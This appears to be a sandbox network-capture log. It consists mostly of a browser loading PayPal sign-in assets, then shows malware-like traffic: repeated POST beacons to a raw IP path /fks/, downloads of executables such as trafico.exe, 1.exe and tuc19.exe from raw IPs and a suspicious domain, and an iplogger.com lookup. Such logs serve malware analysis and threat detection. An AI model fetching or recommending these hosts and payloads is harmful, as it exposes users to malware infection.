timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000f927a16707666-359248b504d5204c-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 23845
GET

https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/lib/modernizr-2.6.1.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/lib/modernizr-2.6.1.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:53 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653bf0d9-edf"
expires: Sat, 02 Nov 2024 04:49:53 GMT
last-modified: Fri, 27 Oct 2023 17:18:17 GMT
paypal-debug-id: 87d73a3897a6b
server: ECAcc (ama/48B8)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000087d73a3897a6b-099d1a7c06714145-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1788
GET

https://www.paypalobjects.com/images/shared/icon-PN-check.png

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /images/shared/icon-PN-check.png HTTP/2.0
host: www.paypalobjects.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ch: DPR, Viewport-Width, Width, ECT, Downlink
accept-ranges: bytes
cache-control: s-maxage=31536000, public,max-age=3600
content-type: image/png
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "60271b47-8bc"
expires: Fri, 03 Nov 2023 05:49:54 GMT
last-modified: Sat, 13 Feb 2021 00:20:23 GMT
paypal-debug-id: 42e2a8b8a39ff
server: ECAcc (ama/48C6)
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-cache: HIT
x-content-type-options: nosniff
content-length: 2236
GET

https://www.paypalobjects.com/images/shared/glyph_alert_critical_big-2x.png

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /images/shared/glyph_alert_critical_big-2x.png HTTP/2.0
host: www.paypalobjects.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ch: DPR, Viewport-Width, Width, ECT, Downlink
accept-ranges: bytes
cache-control: s-maxage=31536000, public,max-age=3600
content-type: image/png
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "54130c54-16c4"
expires: Fri, 03 Nov 2023 05:49:54 GMT
last-modified: Fri, 12 Sep 2014 15:08:04 GMT
paypal-debug-id: 6b89ec0134ddf
server: ECAcc (ama/48C1)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000006b89ec0134ddf-c57c6b841a3cbc91-01
x-cache: HIT
x-content-type-options: nosniff
content-length: 5828
GET

https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/lib/fn-sync-telemetry-min.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/lib/fn-sync-telemetry-min.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653bf0d9-159e"
expires: Sat, 02 Nov 2024 04:49:54 GMT
last-modified: Fri, 27 Oct 2023 17:18:17 GMT
paypal-debug-id: 1df1c75f1c6e4
server: ECAcc (ama/48C4)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000001df1c75f1c6e4-fb225ef79ee33536-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 2303
GET

https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/signin-split.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/signin-split.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653bf0d9-398dc"
expires: Sat, 02 Nov 2024 04:49:54 GMT
last-modified: Fri, 27 Oct 2023 17:18:17 GMT
paypal-debug-id: f76b5a8338bad
server: ECAcc (ama/48AE)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000f76b5a8338bad-1c9e91b1f25a7414-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 53869
GET

https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/ioc.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/9be/71f219fbd1e6dd2c9264422cf6969/js/ioc.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653bf0d9-1407"
expires: Sat, 02 Nov 2024 04:49:54 GMT
last-modified: Fri, 27 Oct 2023 17:18:17 GMT
paypal-debug-id: 90c61a81445a9
server: ECAcc (ama/48C5)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000090c61a81445a9-81a9c81d680a5a93-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 2005
GET

https://www.paypalobjects.com/pa/js/min/pa.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/js/min/pa.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "65415470-10f45+gzip"
expires: Fri, 03 Nov 2023 05:49:54 GMT
last-modified: Tue, 31 Oct 2023 19:24:32 GMT
paypal-debug-id: 38f13d9f4ad07
server: ECAcc (ama/48F0)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000038f13d9f4ad07-3573f6540035370e-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 25375
GET

https://www.paypalobjects.com/webcaptcha/grcenterprise_v3_static.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /webcaptcha/grcenterprise_v3_static.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:54 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"632c74b8-2dea"
expires: Fri, 03 Nov 2023 05:49:54 GMT
last-modified: Thu, 22 Sep 2022 14:44:08 GMT
paypal-debug-id: ba652213d8012
server: ECAcc (ama/48B8)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000ba652213d8012-16e7021d023057e4-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 4128
GET

https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Regular.woff2

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /paypal-ui/fonts/PayPalSansBig-Regular.woff2 HTTP/2.0
host: www.paypalobjects.com
accept: */*
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/font-woff2
date: Fri, 03 Nov 2023 04:49:56 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "60271cda-6318"
expires: Fri, 03 Nov 2023 05:49:56 GMT
last-modified: Sat, 13 Feb 2021 00:27:06 GMT
paypal-debug-id: 5afdb95f0696d
server: ECAcc (ama/4889)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000005afdb95f0696d-b74492ffeae800a7-01
x-cache: HIT
x-content-type-options: nosniff
content-length: 25368
GET

https://www.paypalobjects.com/pa/mi/paypal/latmconf.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /pa/mi/paypal/latmconf.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Fri, 03 Nov 2023 04:50:09 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"65415470-53a69"
expires: Fri, 03 Nov 2023 05:50:09 GMT
last-modified: Tue, 31 Oct 2023 19:24:32 GMT
paypal-debug-id: 1b9fffe4ab8d1
server: ECAcc (ama/48A7)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-00000000000000000001b9fffe4ab8d1-6f6113351675d6cb-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 38266
GET

https://www.paypalobjects.com/webcaptcha/grcenterprise_v3_static.html

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /webcaptcha/grcenterprise_v3_static.html HTTP/2.0
host: www.paypalobjects.com
accept: text/html, application/xhtml+xml, image/jxr, */*
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
cache-control: s-maxage=31536000, public,max-age=3600
content-type: text/html
date: Fri, 03 Nov 2023 04:50:12 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "632c74b8-145d"
expires: Fri, 03 Nov 2023 05:50:12 GMT
last-modified: Thu, 22 Sep 2022 14:44:08 GMT
paypal-debug-id: aff95f253cb24
server: ECAcc (ama/48EE)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000aff95f253cb24-af70e929498f4ebd-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 1704
GET

https://www.paypalobjects.com/paypal-ui/logos/svg/paypal-mark-color.svg

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /paypal-ui/logos/svg/paypal-mark-color.svg HTTP/2.0
host: www.paypalobjects.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: image/svg+xml
date: Fri, 03 Nov 2023 04:50:16 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"62aa5e30-436"
expires: Fri, 03 Nov 2023 05:50:16 GMT
last-modified: Wed, 15 Jun 2022 22:33:20 GMT
paypal-debug-id: 36532606ce5df
server: ECAcc (ama/48B5)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-000000000000000000036532606ce5df-5b43e819cf1f272f-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 548
GET

https://www.paypalobjects.com/webstatic/i/consumer/onboarding/sprite_form_2x.png

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /webstatic/i/consumer/onboarding/sprite_form_2x.png HTTP/2.0
host: www.paypalobjects.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ch: DPR, Viewport-Width, Width, ECT, Downlink
accept-ranges: bytes
cache-control: s-maxage=31536000, public,max-age=3600
content-type: image/png
date: Fri, 03 Nov 2023 04:50:16 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "540587dd-1555"
expires: Fri, 03 Nov 2023 05:50:16 GMT
last-modified: Tue, 02 Sep 2014 09:03:25 GMT
paypal-debug-id: c0b98e2bab7b4
server: ECAcc (ama/48A6)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000c0b98e2bab7b4-e1f178ae532bf399-01
x-cache: HIT
x-content-type-options: nosniff
content-length: 5461
GET

https://www.paypalobjects.com/paypal-ui/fonts/PayPalSansBig-Medium.woff2

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /paypal-ui/fonts/PayPalSansBig-Medium.woff2 HTTP/2.0
host: www.paypalobjects.com
accept: */*
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.paypal.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/font-woff2
date: Fri, 03 Nov 2023 04:50:22 GMT
dc: ccg11-origin-www-1.paypal.com
etag: "60271cda-484c"
expires: Fri, 03 Nov 2023 05:50:22 GMT
last-modified: Sat, 13 Feb 2021 00:27:06 GMT
paypal-debug-id: d00f0e31003ec
server: ECAcc (ama/48E2)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000d00f0e31003ec-346b6722378ccfe1-01
x-cache: HIT
x-content-type-options: nosniff
content-length: 18508
DNS

151.145.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.145.64.172.in-addr.arpa

IN PTR

Response
DNS

73.36.239.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.36.239.18.in-addr.arpa

IN PTR

Response

73.36.239.18.in-addr.arpa

IN PTR

server-18-239-36-73ams58r cloudfrontnet
DNS

25.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.221.229.192.in-addr.arpa

IN PTR

Response
DNS

116.150.6.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.150.6.52.in-addr.arpa

IN PTR

Response

116.150.6.52.in-addr.arpa

IN PTR

ec2-52-6-150-116 compute-1 amazonawscom
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ftfvioml.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 363
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hmqmak.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 291
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:49:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 46
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

i.ytimg.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

i.ytimg.com

IN A

Response

i.ytimg.com

IN A

142.251.36.54

i.ytimg.com

IN A

172.217.168.246

i.ytimg.com

IN A

142.250.179.182

i.ytimg.com

IN A

142.250.179.214

i.ytimg.com

IN A

142.251.36.22

i.ytimg.com

IN A

142.251.39.118

i.ytimg.com

IN A

172.217.168.214

i.ytimg.com

IN A

172.217.23.214

i.ytimg.com

IN A

216.58.208.118

i.ytimg.com

IN A

142.250.179.150
GET

https://i.ytimg.com/generate_204

MicrosoftEdgeCP.exe

Remote address:

142.251.36.54:443

Request

GET /generate_204 HTTP/2.0
host: i.ytimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.youtube.com/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 204

content-length: 0
cross-origin-resource-policy: cross-origin
date: Fri, 03 Nov 2023 04:49:57 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

http://194.169.175.118/trafico.exe

Remote address:

194.169.175.118:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.169.175.118

Response

HTTP/1.1 200 OK

Date: Fri, 03 Nov 2023 04:49:53 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 02 Nov 2023 18:00:21 GMT
ETag: "7cda8-6092f2957a605"
Accept-Ranges: bytes
Content-Length: 511400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

54.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.36.251.142.in-addr.arpa

IN PTR

Response

54.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f221e100net
DNS

118.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.175.169.194.in-addr.arpa

IN PTR

Response
DNS

106.208.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.208.58.216.in-addr.arpa

IN PTR

Response

106.208.58.216.in-addr.arpa

IN PTR

ams17s08-in-f101e100net

106.208.58.216.in-addr.arpa

IN PTR

sof01s11-in-f106�I
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kjpgerqe.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 315
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://aqggfx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 346
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 38
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hcmgnehv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 317
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lqimpegbws.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 345
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cosqdqcpa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 327
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://vleexg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 364
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gdijm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 123
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 03 Nov 2023 04:50:07 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://171.22.28.213/1.exe

Remote address:

171.22.28.213:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 171.22.28.213

Response

HTTP/1.1 200 OK

Date: Fri, 03 Nov 2023 04:50:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Wed, 01 Nov 2023 14:51:44 GMT
ETag: "5e918-6091868e655ce"
Accept-Ranges: bytes
Content-Length: 387352
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

213.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.28.22.171.in-addr.arpa

IN PTR

Response
DNS

iplogger.com

Remote address:

8.8.8.8:53

Request

iplogger.com

IN A

Response

iplogger.com

IN A

148.251.234.93
DNS

18.175.53.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.175.53.84.in-addr.arpa

IN PTR

Response

18.175.53.84.in-addr.arpa

IN PTR

a84-53-175-18deploystaticakamaitechnologiescom
DNS

stim.graspalace.com

Remote address:

8.8.8.8:53

Request

stim.graspalace.com

IN A

Response

stim.graspalace.com

IN A

188.114.96.0

stim.graspalace.com

IN A

188.114.97.0
GET

http://stim.graspalace.com/order/tuc19.exe

Remote address:

188.114.96.0:80

Request

GET /order/tuc19.exe HTTP/1.1
Host: stim.graspalace.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 03 Nov 2023 04:50:05 GMT
Content-Type: application/octet-stream
Content-Length: 5616080
Connection: keep-alive
Content-Description: File Transfer
Content-Disposition: attachment; filename=tuc19.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MaF61%2BUr3URRp%2FE9dMLFlyA%2BuxyL8YniGITMYOXgsfiWytrDrOx7kPFQrajQ1T5VNOltEC5AWOtOmR4RlK2mQ7l%2BN9ZRpSyjHim1uH5i3cAz4CWMF%2Bf9pBrQa%2B%2BNvnK3gbbmCd7J"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8201fe901daf06d8-AMS
